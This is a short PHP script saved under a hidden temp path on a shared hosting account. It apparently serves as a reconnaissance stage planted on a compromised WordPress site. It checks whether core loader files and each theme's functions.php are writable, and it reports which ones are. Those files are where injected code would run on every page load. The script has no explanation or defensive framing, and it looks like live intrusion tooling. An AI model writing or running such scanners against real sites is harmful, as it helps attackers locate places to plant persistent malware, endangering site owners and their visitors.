/home/ramtczxy/.cagefs/tmp/.content
<?php   $f = ['wp-settings.php','wp-load.php']; $r = "/home/ramtczxy/exoticcockatoos.com"; foreach ($f as $p) {     $path = "{$r}/{$p}";     if (is_file($path) && is_writable($path)) {         print "<f>{$p}</f>";     } } $themes_dir = $r . '/wp-content/themes'; if (!is_dir($themes_dir)) {     die('!ended!'); } $theme_dirs = glob($themes_dir . '/*', GLOB_ONLYDIR); foreach ($theme_dirs as $themeDir) {     $p = $themeDir . '/functions.php';     if (file_exists($p) && is_writable($p)) {         $p = explode('/wp-content/', $p)[1];          print "<f>wp-content/{$p}</f>";     } } die('!ended!');